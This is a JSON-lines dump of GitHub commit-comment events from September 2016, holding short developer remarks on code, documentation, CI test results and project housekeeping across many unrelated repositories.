{"id":"4531294524","type":"CommitCommentEvent","actor":{"login":"2013040023"},"repo":{"name":"2013040023/webFrontEnd"},"payload":{"comment":{"id":18938502,"position":null,"line":null,"path":null,"commit_id":"3d16e977c8acc19e90675e3ff67179d199ca199f","created_at":"2016-09-08T01:34:48Z","updated_at":"2016-09-08T01:34:48Z","body":"html,css"}},"created_at":"2016-09-08T01:34:48Z"}
{"id":"4531298976","type":"CommitCommentEvent","actor":{"login":"ccshan"},"repo":{"name":"hakaru-dev/hakaru"},"payload":{"comment":{"id":18938510,"position":null,"line":null,"path":null,"commit_id":"18471743926470e6981d3ca0f07bd259df846441","created_at":"2016-09-08T01:36:23Z","updated_at":"2016-09-08T01:36:23Z","body":"The documentation should take the form of a pattern or invariant as to **when to simplify** so that enough simplification happens and we don't waste much time simplifying what's already simplified. I'm not ready to write such documentation."}},"created_at":"2016-09-08T01:36:23Z"}
{"id":"4531300063","type":"CommitCommentEvent","actor":{"login":"noahmanger"},"repo":{"name":"18F/fec-cms"},"payload":{"comment":{"id":18938513,"position":null,"line":null,"path":null,"commit_id":"2cb35314cb7932aba6e15b29e7fa93f5216e9228","created_at":"2016-09-08T01:36:48Z","updated_at":"2016-09-08T01:36:48Z","body":"All good!"}},"created_at":"2016-09-08T01:36:48Z"}
{"id":"4531302046","type":"CommitCommentEvent","actor":{"login":"ajithcj"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":18938515,"position":null,"line":null,"path":null,"commit_id":"a29f09e94d24fe12d00debfcb6e7830970536114","created_at":"2016-09-08T01:37:28Z","updated_at":"2016-09-08T01:37:28Z","body":"Congrats!!"}},"created_at":"2016-09-08T01:37:28Z"}
{"id":"4531312418","type":"CommitCommentEvent","actor":{"login":"orvice"},"repo":{"name":"orvice/shadowsocks-go"},"payload":{"comment":{"id":18938532,"position":null,"line":null,"path":null,"commit_id":"df93b5d1852ac8eda875df0380c7464de142eca9","created_at":"2016-09-08T01:40:49Z","updated_at":"2016-09-08T01:40:49Z","body":"#78"}},"created_at":"2016-09-08T01:40:49Z"}
{"id":"4531313436","type":"CommitCommentEvent","actor":{"login":"orvice"},"repo":{"name":"orvice/shadowsocks-go"},"payload":{"comment":{"id":18938534,"position":null,"line":null,"path":null,"commit_id":"df93b5d1852ac8eda875df0380c7464de142eca9","created_at":"2016-09-08T01:41:12Z","updated_at":"2016-09-08T01:41:12Z","body":"#75"}},"created_at":"2016-09-08T01:41:12Z"}
{"id":"4531315050","type":"CommitCommentEvent","actor":{"login":"flyjwayur"},"repo":{"name":"Rookies-RGSOC2016/Riot.js-Learning"},"payload":{"comment":{"id":18938538,"position":8,"line":6,"path":"tags/apps-container.tag","commit_id":"875bea46a3d60d666dfce2b68963b615e48c6b84","created_at":"2016-09-08T01:41:43Z","updated_at":"2016-09-08T01:41:43Z","body":"@gr2m @titay2 I was not able to come up with making 'hoodieRoute' (which is riot route variable)work with 'a link' :) Can I put the 'a_onClick' inside of 'hoodieRoute'?:) "}},"created_at":"2016-09-08T01:41:43Z"}
{"id":"4531316902","type":"CommitCommentEvent","actor":{"login":"TommyGH"},"repo":{"name":"AppleWin/AppleWin"},"payload":{"comment":{"id":18938547,"position":null,"line":null,"path":null,"commit_id":"034faa04b91b27cf0b4a81b92497a35cfdf5e21b","created_at":"2016-09-08T01:42:22Z","updated_at":"2016-09-08T01:42:22Z","body":"I noticed on line 12 is \"1.26.0.1 (beta)\".  I'm not sure why \"(beta)\"?\r\nAlso, while you seem to be in \"cleanup\" mode, I've noticed at GitHub.com for Applewin/Applewin, the Readme.md shows an out of date 1.25.0.3 as the \"latest release\". "}},"created_at":"2016-09-08T01:42:22Z"}
{"id":"4531320257","type":"CommitCommentEvent","actor":{"login":"nobuhikosawai"},"repo":{"name":"globalize/globalize"},"payload":{"comment":{"id":18938551,"position":8,"line":200,"path":"lib/globalize/active_record/instance_methods.rb","commit_id":"9b4199bbf5f79cac290c3164547d6d5077f8e1a8","created_at":"2016-09-08T01:43:32Z","updated_at":"2016-09-08T01:43:32Z","body":"This was accidentally changed when my last pull request was created. I made another pull request ( #545 ) to fix this."}},"created_at":"2016-09-08T01:43:32Z"}
{"id":"4531320461","type":"CommitCommentEvent","actor":{"login":"sud80"},"repo":{"name":"sud80/parse-server"},"payload":{"comment":{"id":18938553,"position":6,"line":16,"path":"src/Adapters/Storage/Mongo/MongoTransform.js","commit_id":"675500687e6657fffb7572425e6b955702372963","created_at":"2016-09-08T01:43:37Z","updated_at":"2016-09-08T01:43:37Z","body":"@shivangagarwal Looks like there was a bug. And it was not affecting because it is used only in sort where we typically don't sort by pointers. "}},"created_at":"2016-09-08T01:43:37Z"}
{"id":"4531324979","type":"CommitCommentEvent","actor":{"login":"ljbdelacruz"},"repo":{"name":"ljbdelacruz/LivingWaterTest"},"payload":{"comment":{"id":18938568,"position":null,"line":null,"path":null,"commit_id":"a4c14f82eda99be39003bce7f297d2ca4802d472","created_at":"2016-09-08T01:45:20Z","updated_at":"2016-09-08T01:45:20Z","body":"files"}},"created_at":"2016-09-08T01:45:20Z"}
{"id":"4531328945","type":"CommitCommentEvent","actor":{"login":"shellus"},"repo":{"name":"shellus/angular-MQTT"},"payload":{"comment":{"id":18938576,"position":null,"line":null,"path":null,"commit_id":"3de8fd838ea12a83f24d681846806de310eccf54","created_at":"2016-09-08T01:46:43Z","updated_at":"2016-09-08T01:46:43Z","body":"thank you"}},"created_at":"2016-09-08T01:46:43Z"}
{"id":"4531336849","type":"CommitCommentEvent","actor":{"login":"lancast"},"repo":{"name":"lancast/cci_utk_theme"},"payload":{"comment":{"id":18938609,"position":null,"line":null,"path":null,"commit_id":"98c9af540e6e556059621f864120bc7950cca682","created_at":"2016-09-08T01:49:39Z","updated_at":"2016-09-08T01:49:39Z","body":"I figured out how to actually use git to upload the files, but I created a new repository because I didn't want to re-acquire modules and themes that I had already deleted. \r\n\r\nTo see the various domains, go to /admin/structure/domain/batch/subdomain, edit the individual domain names to match the alias names you have for your local development environment.  For instance, on MAMP, my host name is cci and my alias are cci.drupal, jem.drupal, sis.drupal, etc. Each domain has a separate login, if you need to login to it. It is important to look at each domain, because each one has a different menu that may have many menu items and sub-levels or just a few menu items and sub-levels and the theme needs to manage all of these menus. \r\n\r\nI tried to delete any modules and themes that were no longer needed. I am still using the Scripps theme for lobby and lab displays (/scripps-display, /lobby-display), so still need Omega, Delta, and Theme-key.  \r\n\r\nEven though we want the desktop menu to act like the ones on Arts & Sciences sites, I still want each intermediate menu link to work and be clickable. \r\n\r\nThanks for all your hard work. "}},"created_at":"2016-09-08T01:49:39Z"}
{"id":"4531338512","type":"CommitCommentEvent","actor":{"login":"dancingshell"},"repo":{"name":"fabien/lb-connector-mandrill"},"payload":{"comment":{"id":18938618,"position":5,"line":140,"path":"lib/mandrill.js","commit_id":"730b88f8a7f6f80bcc88d99e4aaa40321f62d9ce","created_at":"2016-09-08T01:50:15Z","updated_at":"2016-09-08T01:50:15Z","body":"@fabien can you open up creating issues to the community so we can grown this project? thanks for the connector"}},"created_at":"2016-09-08T01:50:15Z"}
{"id":"4531338738","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18938621,"position":null,"line":null,"path":null,"commit_id":"94f7a1033dc591525ca6e85a2fb02b11d4d12323","created_at":"2016-09-08T01:50:19Z","updated_at":"2016-09-08T01:50:19Z","body":"128792325-Issue5803 (wfbuhl) - x86_64-MacOS-10.9-clang: OK (2307 of 2324 tests passed, 552 test warnings)\n\n * 565 tests had: AUD diffs.\n * 164 tests had: EIO diffs.\n * 87 tests had: ERR diffs.\n * 11 tests had: ESO big diffs.\n * 11 tests had: MTR big diffs.\n * 13 tests had: Table big diffs.\n * 24 tests had: RDD diffs.\n * 13 tests had: ESO small diffs.\n * 11 tests had: MTR small diffs.\n * 2 tests had: Table small diffs.\n * 1 test had: MTD diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-94f7a1033dc591525ca6e85a2fb02b11d4d12323-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-94f7a1033dc591525ca6e85a2fb02b11d4d12323-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.27%25-yellow.svg)</a> \n"}},"created_at":"2016-09-08T01:50:19Z"}
{"id":"4531341034","type":"CommitCommentEvent","actor":{"login":"smichel17"},"repo":{"name":"mpcjanssen/simpletask-android"},"payload":{"comment":{"id":18938639,"position":36,"line":0,"path":"src/main/java/nl/mpcjanssen/simpletask/Simpletask.kt","commit_id":"c9ac2124968170e533fb6ddc8d75618a4984c08a","created_at":"2016-09-08T01:51:09Z","updated_at":"2016-09-08T01:51:09Z","body":"What does this do? It didn't seem to change anything for me when I removed it; it was the inline suppress that mattered for suppressing the compiler warnings."}},"created_at":"2016-09-08T01:51:09Z"}
{"id":"4531348839","type":"CommitCommentEvent","actor":{"login":"frpeters"},"repo":{"name":"frpeters/LinkedData"},"payload":{"comment":{"id":18938668,"position":null,"line":null,"path":null,"commit_id":"6c20b97c50389a850a312bff0b1a90e7fdd766d1","created_at":"2016-09-08T01:53:58Z","updated_at":"2016-09-08T01:53:58Z","body":"Personal profile on RDF/Turtle, linked together with other profiles to create a simple social network."}},"created_at":"2016-09-08T01:53:58Z"}
{"id":"4531349741","type":"CommitCommentEvent","actor":{"login":"joshtriplett"},"repo":{"name":"rust-lang/rfcs"},"payload":{"comment":{"id":18938669,"position":8,"line":425,"path":"text/1444-union.md","commit_id":"7dd371bd39d7f02e2f832694af76a7af675cc779","created_at":"2016-09-08T01:54:17Z","updated_at":"2016-09-08T01:54:17Z","body":"This seems to be missing a few words: \"when assigning to a field whose type implements\"?  In its current state, it's a sentence fragment."}},"created_at":"2016-09-08T01:54:17Z"}
{"id":"4531349763","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18938670,"position":null,"line":null,"path":null,"commit_id":"94f7a1033dc591525ca6e85a2fb02b11d4d12323","created_at":"2016-09-08T01:54:18Z","updated_at":"2016-09-08T01:54:18Z","body":"128792325-Issue5803 (wfbuhl) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1184 of 1184 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-94f7a1033dc591525ca6e85a2fb02b11d4d12323-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-94f7a1033dc591525ca6e85a2fb02b11d4d12323-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-94f7a1033dc591525ca6e85a2fb02b11d4d12323-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-35.95%25-green.svg)</a>\n"}},"created_at":"2016-09-08T01:54:18Z"}
{"id":"4531350098","type":"CommitCommentEvent","actor":{"login":"PSSolutionDetails"},"repo":{"name":"PSSolutionDetails/HelloWorld"},"payload":{"comment":{"id":18938672,"position":null,"line":null,"path":null,"commit_id":"8e746811ebb0c356fdca0c3b9253d77dd0a81458","created_at":"2016-09-08T01:54:26Z","updated_at":"2016-09-08T01:54:26Z","body":"InitialFile"}},"created_at":"2016-09-08T01:54:26Z"}
{"id":"4531353700","type":"CommitCommentEvent","actor":{"login":"dcfreema"},"repo":{"name":"dcfreema/APM367"},"payload":{"comment":{"id":18938683,"position":28,"line":28,"path":"HW1/rotateArray.java","commit_id":"108d023cb5d7e59410f8748546c2e92861e6d826","created_at":"2016-09-08T01:55:42Z","updated_at":"2016-09-08T01:55:42Z","body":"This line is causing some issues with carrying over the last rotating int."}},"created_at":"2016-09-08T01:55:42Z"}
{"id":"4531354167","type":"CommitCommentEvent","actor":{"login":"dcfreema"},"repo":{"name":"dcfreema/APM367"},"payload":{"comment":{"id":18938684,"position":43,"line":43,"path":"HW1/rotateArray.java","commit_id":"108d023cb5d7e59410f8748546c2e92861e6d826","created_at":"2016-09-08T01:55:54Z","updated_at":"2016-09-08T01:55:54Z","body":"This line is causing some issues with carrying over the last rotating char."}},"created_at":"2016-09-08T01:55:54Z"}
{"id":"4531359198","type":"CommitCommentEvent","actor":{"login":"lemonlatte"},"repo":{"name":"lemonlatte/goradar-api"},"payload":{"comment":{"id":18938695,"position":35,"line":35,"path":"main.go","commit_id":"82236dd9e43cc025246e9f2f3291e4334d95705b","created_at":"2016-09-08T01:57:47Z","updated_at":"2016-09-08T01:57:47Z","body":"The time/hash/key pair is generated from android/ios apps. And each pair will expired in a period of time."}},"created_at":"2016-09-08T01:57:47Z"}
{"id":"4531360320","type":"CommitCommentEvent","actor":{"login":"Mithgol"},"repo":{"name":"nwjs/npm-installer"},"payload":{"comment":{"id":18938698,"position":null,"line":null,"path":null,"commit_id":"e674d1c24e16ee2b3c52d4d64fd425e9628e797a","created_at":"2016-09-08T01:58:11Z","updated_at":"2016-09-08T01:58:11Z","body":"**Note: ** this commit is intended to reflect [changes made in `file-exists`](https://github.com/scottcorgan/file-exists/compare/2915cfcbd7f1ee872557be24a54d3ecc1f5e5d78...371df5917e6f9d9d23b1f81b4e6552bb5ac3b3d5) after scottcorgan/file-exists#3."}},"created_at":"2016-09-08T01:58:11Z"}
{"id":"4531364352","type":"CommitCommentEvent","actor":{"login":"anshulongithub"},"repo":{"name":"ElbertoOne/Stockfish"},"payload":{"comment":{"id":18938709,"position":null,"line":null,"path":null,"commit_id":"f6bddeb27b95282f040db815f8ac248dbcaf1d09","created_at":"2016-09-08T01:59:33Z","updated_at":"2016-09-08T01:59:33Z","body":"@ElbertoOne LTC for this?"}},"created_at":"2016-09-08T01:59:33Z"}
{"id":"4533006508","type":"CommitCommentEvent","actor":{"login":"doublemarked"},"repo":{"name":"strongloop/loopback"},"payload":{"comment":{"id":18942348,"position":null,"line":null,"path":null,"commit_id":"98816217c951bdc0a357e427f987ae491e5e3384","created_at":"2016-09-08T10:00:10Z","updated_at":"2016-09-08T10:00:10Z","body":"@bajtos Came across this while debugging a similar problem. Is there any reason (as a user) to not always be passing this `localRegistry` flag w/ app creation? "}},"created_at":"2016-09-08T10:00:10Z"}
{"id":"4533017337","type":"CommitCommentEvent","actor":{"login":"ged-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":18942378,"position":null,"line":null,"path":null,"commit_id":"a04a8c2e45c276231e781e2c11d2146fcc8349e8","created_at":"2016-09-08T10:02:11Z","updated_at":"2016-09-08T10:02:11Z","body":"ok"}},"created_at":"2016-09-08T10:02:11Z"}
{"id":"4533023288","type":"CommitCommentEvent","actor":{"login":"Binaryvector"},"repo":{"name":"Binaryvector/HarvestMap"},"payload":{"comment":{"id":18942394,"position":null,"line":null,"path":null,"commit_id":"51dfc730aac114d30f9bf25cf0d26c0220f34070","created_at":"2016-09-08T10:03:21Z","updated_at":"2016-09-08T10:03:21Z","body":"> \"Sacrifice modularization for better perfomance\" ©\r\n> Looks like a joke, because it's not perfomance when you have a lot of unobvious calls in each place, for example, try to count calls of RefreshPins in getters/setters of settings - it's a crutch. It could be much simplier, but you prefer some sort of \"perfomance\" and easiest solutions simillar to \"Everybody must know about map, measurements, caches implementation\" ... about everything.\r\n\r\nThe \"sacrifice modularization for better performance\" was more related to that database stuff.\r\nFor instance creating pins is a bottleneck so I didn't want to go through the whole database abstraction for every single pin and instead just pass the caches to the pin modules, to get a faster access to the nodes properties.\r\n\r\nI still use events, but they need to be actual events (as in something special/important happened). So for instance if a setting changed, it fires an event which is handled in the map/compass etc module. There is no RefreshPins in the setters for the options anymore (except for the not yet reworked modules like heatmap).\r\n\r\nAnother thing that I removed in that commit was the whole controller stuff which seemed like \r\nunnecessary overhead to me. For instance if I want a node to be saved in the database, I can just call Database.AddNode(...). Just a simple function call as opposed to have a controller class, of which a controller object is created, which then registers callbacks and then having to fire an CREATE_NODE_REQUEST event which then executes the callback which doesn't do anything except for just calling the previously mentioned Database.AddNode(...) function.\r\nI guess this can be called as breaking abstraction because the other module needs to know that the database module has the AddNode function, but I don't see why/how that is worse than the module needing to know which event to fire when it wants a node to be added."}},"created_at":"2016-09-08T10:03:21Z"}
{"id":"4533033385","type":"CommitCommentEvent","actor":{"login":"phts"},"repo":{"name":"19379/foo-jscript-panel"},"payload":{"comment":{"id":18942416,"position":null,"line":null,"path":null,"commit_id":"7d3716452d6bfcbbeadda91f07d5a915d943933c","created_at":"2016-09-08T10:05:23Z","updated_at":"2016-09-08T10:05:23Z","body":"I noticed that you рфму removed [js-marc2003](https://github.com/19379/js-marc2003) repository. \r\n\r\nWhat happened to it? Are you planning to publish the scripts back?"}},"created_at":"2016-09-08T10:05:23Z"}
{"id":"4533033968","type":"CommitCommentEvent","actor":{"login":"hvr"},"repo":{"name":"haskell/network-uri"},"payload":{"comment":{"id":18942418,"position":7,"line":6,"path":"README.md","commit_id":"c6441d19e3ef4286a0c4ab92ee6977ff6ba27f17","created_at":"2016-09-08T10:05:30Z","updated_at":"2016-09-08T10:05:30Z","body":"btw, are you aware you can use labelled hyperlink markup like\r\n\r\n```\r\n   ...closely following the URI spec, IETF <http://www.ietf.org/rfc/rfc3986.txt RFC 3986> \r\n```\r\n\r\n?"}},"created_at":"2016-09-08T10:05:30Z"}
{"id":"4533035636","type":"CommitCommentEvent","actor":{"login":"alexkiro"},"repo":{"name":"SpamExperts/trac-slack"},"payload":{"comment":{"id":18942430,"position":165,"line":165,"path":"application.py","commit_id":"4dc8ec384980dfe22865ef29510d7053b98b0a37","created_at":"2016-09-08T10:05:50Z","updated_at":"2016-09-08T10:05:50Z","body":"I think we need a `:nic:` somewhere as well "}},"created_at":"2016-09-08T10:05:50Z"}
{"id":"4533039850","type":"CommitCommentEvent","actor":{"login":"vendethiel"},"repo":{"name":"winzombie/ezarena"},"payload":{"comment":{"id":18942438,"position":null,"line":null,"path":null,"commit_id":"22ed62cbafa0edcd85da68869235ac2880bd5bc6","created_at":"2016-09-08T10:06:40Z","updated_at":"2016-09-08T10:06:40Z","body":"> +\t\t<td class=\"{see_shop.items.ROW_CLASS}\" align=\"center\"><span class=\"gensmall\">{see_shop.items.ITEM_QUALITY}</span></td>\r\n\r\nI did that in aaaec6ebf90494d8821d8b2838368a896325efda :).\r\n\r\nDon't worry about the number of lines. It's just because the original file used `\"\\r\"` to terminate lines (old windows/mac), but nowadays we use `\"\\n\"`."}},"created_at":"2016-09-08T10:06:40Z"}
{"id":"4533041669","type":"CommitCommentEvent","actor":{"login":"KhomutovAndrey"},"repo":{"name":"KhomutovAndrey/VkTouts"},"payload":{"comment":{"id":18942442,"position":null,"line":null,"path":null,"commit_id":"c89b0d985c757b1d3a3e03a13b783f2c590fe439","created_at":"2016-09-08T10:07:02Z","updated_at":"2016-09-08T10:07:02Z","body":"1"}},"created_at":"2016-09-08T10:07:02Z"}
{"id":"4533044546","type":"CommitCommentEvent","actor":{"login":"oguzhanbaser"},"repo":{"name":"oguzhanbaser/ethernet"},"payload":{"comment":{"id":18942450,"position":null,"line":null,"path":null,"commit_id":"483079634d91d028cf1d75c98d4ffbc0094f3305","created_at":"2016-09-08T10:07:37Z","updated_at":"2016-09-08T10:07:37Z","body":"olur reis :)"}},"created_at":"2016-09-08T10:07:37Z"}
{"id":"4533049059","type":"CommitCommentEvent","actor":{"login":"karolCascavita"},"repo":{"name":"karolCascavita/hello-world-2"},"payload":{"comment":{"id":18942459,"position":null,"line":null,"path":null,"commit_id":"862f79d175ac6f5f1708fa0eff50c180cb9d1542","created_at":"2016-09-08T10:08:34Z","updated_at":"2016-09-08T10:08:34Z","body":"Añadi mas info"}},"created_at":"2016-09-08T10:08:34Z"}
{"id":"4533049651","type":"CommitCommentEvent","actor":{"login":"plq"},"repo":{"name":"arskom/spyne"},"payload":{"comment":{"id":18942461,"position":null,"line":null,"path":null,"commit_id":"0e762659f61179899043ec924c7b5ab45aef4a13","created_at":"2016-09-08T10:08:42Z","updated_at":"2016-09-08T10:08:42Z","body":"I just made a release with this fix included\r\n"}},"created_at":"2016-09-08T10:08:42Z"}
{"id":"4533055811","type":"CommitCommentEvent","actor":{"login":"millin"},"repo":{"name":"groveco/django-sql-explorer"},"payload":{"comment":{"id":18942474,"position":null,"line":null,"path":null,"commit_id":"77e2778d2b76b2d5f90b6585041437ae5e4a9dbe","created_at":"2016-09-08T10:09:59Z","updated_at":"2016-09-08T10:09:59Z","body":"Everything looks Ok. Could you merge?"}},"created_at":"2016-09-08T10:09:59Z"}
{"id":"4533059699","type":"CommitCommentEvent","actor":{"login":"niko-rodrigue"},"repo":{"name":"sbmlteam/jsbml"},"payload":{"comment":{"id":18942485,"position":33,"line":568,"path":"core/src/org/sbml/jsbml/CVTerm.java","commit_id":"2c7f98916f839cae76849365ba6399e780ac56c1","created_at":"2016-09-08T10:10:46Z","updated_at":"2016-09-08T10:10:46Z","body":"Why is this method declare to throw so many exceptions ?"}},"created_at":"2016-09-08T10:10:46Z"}
{"id":"4533061477","type":"CommitCommentEvent","actor":{"login":"ukupat"},"repo":{"name":"taivokasper/foos"},"payload":{"comment":{"id":18942488,"position":5,"line":7,"path":"build.gradle","commit_id":"6f9acbefa4d851786104648786f75c88e2b5c530","created_at":"2016-09-08T10:11:10Z","updated_at":"2016-09-08T10:11:10Z","body":"@taivokasper 👍  good work"}},"created_at":"2016-09-08T10:11:10Z"}
{"id":"4533066980","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"lucabrivio/Stockfish"},"payload":{"comment":{"id":18942500,"position":null,"line":null,"path":null,"commit_id":"277a096add6b74ff533425f005f183dc6b2839a8","created_at":"2016-09-08T10:12:17Z","updated_at":"2016-09-08T10:12:17Z","body":"ATM I can't use my PC, I hope to sort this out soon... :-("}},"created_at":"2016-09-08T10:12:17Z"}
{"id":"4533067876","type":"CommitCommentEvent","actor":{"login":"Pythonyte"},"repo":{"name":"Pythonyte/Algorithms"},"payload":{"comment":{"id":18942502,"position":null,"line":null,"path":null,"commit_id":"8e44aabf7796673be285b3baba18b62b573af4f7","created_at":"2016-09-08T10:12:28Z","updated_at":"2016-09-08T10:12:28Z","body":"It would be better if we use stack.. instead of deleting array from last and adding element in last."}},"created_at":"2016-09-08T10:12:28Z"}
{"id":"4533069686","type":"CommitCommentEvent","actor":{"login":"matokvekal"},"repo":{"name":"matokvekal/tichonetAdminNew"},"payload":{"comment":{"id":18942507,"position":null,"line":null,"path":null,"commit_id":"47eea16e24dea44d1ecfacea56e09b45679e2bb2","created_at":"2016-09-08T10:12:52Z","updated_at":"2016-09-08T10:12:52Z","body":"new copy of adminTichonet"}},"created_at":"2016-09-08T10:12:52Z"}
{"id":"4533069848","type":"CommitCommentEvent","actor":{"login":"mojinet"},"repo":{"name":"mojinet/ajoutDeLien"},"payload":{"comment":{"id":18942508,"position":null,"line":null,"path":null,"commit_id":"4bc45cedbbe943fff954fde68ac784766a2ea22b","created_at":"2016-09-08T10:12:54Z","updated_at":"2016-09-08T10:12:54Z","body":"Comment je peux supprimer ce commit depuis GitHub??"}},"created_at":"2016-09-08T10:12:54Z"}
{"id":"4533071649","type":"CommitCommentEvent","actor":{"login":"aaronFlynn"},"repo":{"name":"aaronFlynn/acceptance-tests-alpha"},"payload":{"comment":{"id":18942512,"position":null,"line":null,"path":null,"commit_id":"24be45d32e2736521bc82bbc77893d1d24718c89","created_at":"2016-09-08T10:13:17Z","updated_at":"2016-09-08T10:13:17Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;1ORkoJud&#x2F;13-github-integreate\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Github integreate</a>"}},"created_at":"2016-09-08T10:13:17Z"}
{"id":"4533074620","type":"CommitCommentEvent","actor":{"login":"dongshaowei"},"repo":{"name":"goagent/goagent"},"payload":{"comment":{"id":18942516,"position":null,"line":null,"path":null,"commit_id":"e492ed0283f5cde7cf71d7ac47429f64aa48cd13","created_at":"2016-09-08T10:13:54Z","updated_at":"2016-09-08T10:13:54Z","body":"谢谢"}},"created_at":"2016-09-08T10:13:54Z"}
{"id":"4533082175","type":"CommitCommentEvent","actor":{"login":"chelmuth"},"repo":{"name":"genodelabs/genode"},"payload":{"comment":{"id":18942529,"position":5,"line":177,"path":"repos/base-hw/src/core/include/pager.h","commit_id":"23afcfc42f3444b366c8813f28ed88779d91cef8","created_at":"2016-09-08T10:15:31Z","updated_at":"2016-09-08T10:15:31Z","body":"What does this comment actually mean?"}},"created_at":"2016-09-08T10:15:31Z"}
{"id":"4533087283","type":"CommitCommentEvent","actor":{"login":"FrederickChan"},"repo":{"name":"php-fusion/PHP-Fusion"},"payload":{"comment":{"id":18942541,"position":null,"line":null,"path":null,"commit_id":"467b01fae2a86dde4c1bd10a81103906929b8297","created_at":"2016-09-08T10:16:35Z","updated_at":"2016-09-08T10:16:35Z","body":"ok. let's keep the old one."}},"created_at":"2016-09-08T10:16:35Z"}
{"id":"4533089828","type":"CommitCommentEvent","actor":{"login":"staabm"},"repo":{"name":"redaxo/redaxo4"},"payload":{"comment":{"id":18942546,"position":null,"line":null,"path":null,"commit_id":"b1d9c9dd610e012c9a0bc9875002c1756c6e916a","created_at":"2016-09-08T10:17:09Z","updated_at":"2016-09-08T10:17:09Z","body":"@gharlan fyi, merge in master ist noch offen"}},"created_at":"2016-09-08T10:17:09Z"}
{"id":"4533092956","type":"CommitCommentEvent","actor":{"login":"rbgarga"},"repo":{"name":"pfsense/pfsense"},"payload":{"comment":{"id":18942551,"position":null,"line":null,"path":null,"commit_id":"8dee84f4cef55a2f008a319022a762b92e00117e","created_at":"2016-09-08T10:17:46Z","updated_at":"2016-09-08T10:17:46Z","body":"Good catch. File restored. Thanks!"}},"created_at":"2016-09-08T10:17:46Z"}
{"id":"4533094779","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"Shnoulle/LimeSurvey-Shnoulle"},"payload":{"comment":{"id":18942555,"position":null,"line":null,"path":null,"commit_id":"f3c27a540f1be965e2457faa8249d0e4f52653f4","created_at":"2016-09-08T10:18:12Z","updated_at":"2016-09-08T10:18:12Z","body":"@LouisGac : i think other array are already OK with this fix :)"}},"created_at":"2016-09-08T10:18:12Z"}
{"id":"4533095537","type":"CommitCommentEvent","actor":{"login":"23Skidoo"},"repo":{"name":"haskell/cabal"},"payload":{"comment":{"id":18942557,"position":null,"line":null,"path":null,"commit_id":"798470a776c5c35cff5cb3d9327a11cbf98b5365","created_at":"2016-09-08T10:18:22Z","updated_at":"2016-09-08T10:18:22Z","body":"Please also update https://github.com/haskell/cabal/wiki/Making-a-release."}},"created_at":"2016-09-08T10:18:22Z"}
{"id":"4533098499","type":"CommitCommentEvent","actor":{"login":"kaiwood"},"repo":{"name":"textmate/textmate"},"payload":{"comment":{"id":18942560,"position":null,"line":null,"path":null,"commit_id":"dc0331b781246cf76d0f2dc3b71638d2677fac5d","created_at":"2016-09-08T10:19:02Z","updated_at":"2016-09-08T10:19:02Z","body":"A little bit late to the party, but: This change made it impossible to change the shortcut via system settings because of the dynamic title.\r\n\r\nI had it bound to CMD-Shift-R for a really long time, for consistency reasons (the others are all CMD-Shift-Something) and because I use CTRL-Shift-Something as global shortcuts for launching applications. "}},"created_at":"2016-09-08T10:19:02Z"}
{"id":"4533100300","type":"CommitCommentEvent","actor":{"login":"chelmuth"},"repo":{"name":"genodelabs/genode"},"payload":{"comment":{"id":18942562,"position":7,"line":371,"path":"repos/base-nova/src/core/include/pager.h","commit_id":"23afcfc42f3444b366c8813f28ed88779d91cef8","created_at":"2016-09-08T10:19:25Z","updated_at":"2016-09-08T10:19:25Z","body":"Same here..."}},"created_at":"2016-09-08T10:19:25Z"}
{"id":"4533102878","type":"CommitCommentEvent","actor":{"login":"sergeyklay"},"repo":{"name":"phalcon/docs"},"payload":{"comment":{"id":18942569,"position":null,"line":null,"path":null,"commit_id":"420fb12821704143c2f85c6467f32f5bf362e219","created_at":"2016-09-08T10:19:59Z","updated_at":"2016-09-08T10:19:59Z","body":"👍 "}},"created_at":"2016-09-08T10:19:59Z"}
{"id":"4533103042","type":"CommitCommentEvent","actor":{"login":"gjhoon"},"repo":{"name":"likelion-kau1/malangKau"},"payload":{"comment":{"id":18942570,"position":null,"line":null,"path":null,"commit_id":"a4e6253039705e8277c1b8bbd9930255c16a8ea1","created_at":"2016-09-08T10:20:02Z","updated_at":"2016-09-08T10:20:02Z","body":"네~ 제가 아직은 css 공부하면서 레이아웃만 잡고있어서 뭐라 설명할게 없네욬ㅋㅋㅋ\r\n디자인 감각도 없어서 이것저것 바꿔보면서 그나마 괜찮은걸로 하고있어요 ㅠㅠ"}},"created_at":"2016-09-08T10:20:02Z"}
